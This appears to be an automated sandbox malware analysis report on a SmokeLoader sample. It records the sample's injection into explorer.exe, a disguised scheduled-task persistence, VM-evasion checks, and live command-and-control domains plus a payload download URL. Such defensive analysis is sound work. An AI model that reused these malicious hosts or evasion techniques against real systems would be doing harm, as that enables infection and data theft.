Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_00489051 push 004618E3h; ret	5_2_0048916C

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wdscede

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EE5A.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F50.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	File created: C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wdscede	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\wdscede:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\F50.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 4192	Thread sleep count: 637 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2952	Thread sleep count: 1092 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2952	Thread sleep time: -109200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4184	Thread sleep count: 1115 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4184	Thread sleep time: -111500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5188	Thread sleep count: 550 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2088	Thread sleep count: 672 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2088	Thread sleep time: -67200s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F50.exe TID: 4792	Thread sleep time: -600000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\F50.exe

Thread delayed: delay time: 600000

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 637	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1092	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1115	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 550	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 672	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\F50.exe

File opened: PHYSICALDRIVE0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe

API coverage: 7.8 %

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 136000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F50.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: explorer.exe, 00000001.00000000.363064652.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000001.00000000.362954158.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000000.412581778.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000001.00000000.419969710.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: F50.exe, 0000000C.00000002.569572014.0000000004A5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vMCI,
Source: explorer.exe, 00000001.00000000.396142843.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: F50.exe, 00000006.00000000.485963215.0000000002BE1000.00000002.00000001.01000000.00000008.sdmp, F50.exe, 0000000C.00000000.526838122.0000000002BE1000.00000002.00000001.01000000.00000008.sdmp, F50.exe.1.dr	Binary or memory string: ~kVOkVdsnqemU}
Source: explorer.exe, 00000001.00000000.362954158.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: F50.exe, 0000000C.00000002.576900632.0000000005462000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K,<=;;?9:VMcI;8

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C00D90 mov eax, dword ptr fs:[00000030h]		0_2_02C00D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C0092B mov eax, dword ptr fs:[00000030h]		0_2_02C0092B

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: wdscede.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 194.135.33.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: vatra.at
Source: C:\Windows\explorer.exe	Domain query: degroeneuitzender.nl

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 2A419E0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wdscede	Thread created: unknown EIP: 4C019E0			Jump to behavior

Source: explorer.exe, 00000001.00000000.405860360.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.378018364.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.341647376.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000001.00000000.405860360.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.378018364.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.382372011.0000000005C70000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.405860360.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.378018364.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.341647376.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.377617070.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.341516862.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.405341084.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: explorer.exe, 00000001.00000000.405860360.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.378018364.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.341647376.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0.3.file.exe.2d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wdscede.2bd0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.2c00e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wdscede.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.wdscede.2be0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.327713150.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.570683568.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0.3.file.exe.2d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wdscede.2bd0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.2c00e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wdscede.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.wdscede.2be0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.327713150.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.570683568.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	1 Input Capture	1 Query Registry	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	12 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	124 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	46%	ReversingLabs	Win32.Backdoor.Convagent
file.exe	52%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\F50.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EE5A.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wdscede	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EE5A.exe	48%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp	40%	ReversingLabs	Win32.Trojan.DanaBot
C:\Users\user\AppData\Roaming\wdscede	46%	ReversingLabs	Win32.Backdoor.Convagent

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.2.F50.exe.4a6512c.2.unpack	100%	Avira	TR/Patched.Ren.Gen7	Download File
0.2.file.exe.2c00e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.EE5A.exe.4a70e67.1.unpack	100%	Avira	HEUR/AGEN.1215478	Download File
5.3.EE5A.exe.4b90000.0.unpack	100%	Avira	HEUR/AGEN.1215478	Download File
4.2.wdscede.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.3.wdscede.2be0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.F50.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.EE5A.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2	Download File
0.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.F50.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.file.exe.2d30000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.wdscede.2bd0e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
vatra.at	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://degroeneuitzender.nl/systems/index.php	0%	URL Reputation	safe
https://degroeneuitzender.nl/systems/index.php	0%	URL Reputation	safe
http://194.135.33.42/intel.exe	2%	Virustotal		Browse
http://cracker.biz/tmp/	0%	URL Reputation	safe
http://skinndia.com/tmp/	0%	URL Reputation	safe
http://vatra.at/tmp/	0%	URL Reputation	safe
http://194.135.33.42/intel.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
degroeneuitzender.nl	5.135.247.111	true	true		unknown
vatra.at	200.46.66.71	true	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://degroeneuitzender.nl/systems/index.php	false	URL Reputation: safe URL Reputation: safe	unknown
http://194.135.33.42/intel.exe	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://cracker.biz/tmp/	true	URL Reputation: safe	unknown
http://skinndia.com/tmp/	true	URL Reputation: safe	unknown
http://vatra.at/tmp/	true	URL Reputation: safe	unknown
http://piratia-life.ru/tmp/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.393736698.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.419303004.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.362501774.0000000008260000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.135.247.111	degroeneuitzender.nl	France	16276	OVHFR	true
187.170.238.164	unknown	Mexico	8151	UninetSAdeCVMX	false
194.135.33.42	unknown	Russian Federation	49392	ASBAXETNRU	true
211.40.39.251	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
109.98.58.98	unknown	Romania	9050	RTDBucharestRomaniaRO	false
211.119.84.112	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
200.46.66.71	vatra.at	Panama	18809	CableOndaPA	true
58.235.189.192	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	780216
Start date and time:	2023-01-08 16:13:13 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@9/5@21/9
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 76.1% (good quality ratio 62.3%) Quality average: 45.2% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 96
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:15:19	Task Scheduler	Run new task: Firefox Default Browser Agent E2E714EC49953D45 path: C:\Users\user\AppData\Roaming\wdscede
16:15:45	API Interceptor	63x Sleep call for process: rundll32.exe modified
16:16:10	API Interceptor	1x Sleep call for process: F50.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
5.135.247.111	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
187.170.238.164	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	sOwJIEX4MO.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
degroeneuitzender.nl	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
vatra.at	file.exe	Get hash	malicious	Browse	186.182.55.44
	file.exe	Get hash	malicious	Browse	84.224.236.42
	file.exe	Get hash	malicious	Browse	31.167.195.81
	file.exe	Get hash	malicious	Browse	181.94.48.228
	file.exe	Get hash	malicious	Browse	195.158.3.162
	file.exe	Get hash	malicious	Browse	211.119.84.112
	file.exe	Get hash	malicious	Browse	200.46.66.71
	file.exe	Get hash	malicious	Browse	186.182.55.44
	file.exe	Get hash	malicious	Browse	109.102.255.230
	file.exe	Get hash	malicious	Browse	175.126.109.15
	file.exe	Get hash	malicious	Browse	95.107.163.44
	file.exe	Get hash	malicious	Browse	190.140.74.43
	file.exe	Get hash	malicious	Browse	37.34.248.24
	file.exe	Get hash	malicious	Browse	151.251.24.5
	file.exe	Get hash	malicious	Browse	151.251.24.5
	file.exe	Get hash	malicious	Browse	210.182.29.70
	file.exe	Get hash	malicious	Browse	175.120.254.9
	file.exe	Get hash	malicious	Browse	186.182.55.44
	file.exe	Get hash	malicious	Browse	190.147.188.50
	file.exe	Get hash	malicious	Browse	211.171.233.129

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UninetSAdeCVMX	ZBdhdOCSw8.elf	Get hash	malicious	Browse	187.157.101.68
	JzKeM0GpxV.elf	Get hash	malicious	Browse	187.238.31.196
	12OMRfKxvu.elf	Get hash	malicious	Browse	189.187.216.75
	U1lnaOUMhH.elf	Get hash	malicious	Browse	187.233.251.95
	AP7H3dk8Ul.elf	Get hash	malicious	Browse	187.136.246.57
	8YWSbtIGeC.elf	Get hash	malicious	Browse	189.146.233.145
	jE4ioc4c6X.elf	Get hash	malicious	Browse	201.102.230.58
	file.exe	Get hash	malicious	Browse	187.156.85.141
	file.exe	Get hash	malicious	Browse	187.212.192.17
	file.exe	Get hash	malicious	Browse	187.156.85.141
	file.exe	Get hash	malicious	Browse	187.170.238.164
	file.exe	Get hash	malicious	Browse	187.170.238.164
	file.exe	Get hash	malicious	Browse	187.170.238.164
	ZBMaAaLsep.exe	Get hash	malicious	Browse	187.168.62.121
	file.exe	Get hash	malicious	Browse	187.233.34.175
	file.exe	Get hash	malicious	Browse	187.233.34.175
	wZewuGcqjg.elf	Get hash	malicious	Browse	201.123.145.20
	IjjVUoZOjG.elf	Get hash	malicious	Browse	187.157.101.74
	LUUU7uq36w.elf	Get hash	malicious	Browse	187.143.223.84
	file.exe	Get hash	malicious	Browse	187.170.238.164
OVHFR	JPizdU1N6R.elf	Get hash	malicious	Browse	51.161.64.194
	0xzdoFh53o.elf	Get hash	malicious	Browse	51.161.64.194
	JgcR28z1x1.elf	Get hash	malicious	Browse	51.161.64.194
	g5udoka2nW.elf	Get hash	malicious	Browse	51.161.64.194
	file.exe	Get hash	malicious	Browse	51.210.137.6
	file.exe	Get hash	malicious	Browse	5.135.247.111
	JzKeM0GpxV.elf	Get hash	malicious	Browse	51.75.154.3
	mG117OcDyZ.elf	Get hash	malicious	Browse	51.161.64.194
	file.exe	Get hash	malicious	Browse	5.135.247.111
	E8hNgFBJSp.elf	Get hash	malicious	Browse	51.161.64.194
	file.exe	Get hash	malicious	Browse	142.44.214.143
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	51.83.33.228
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
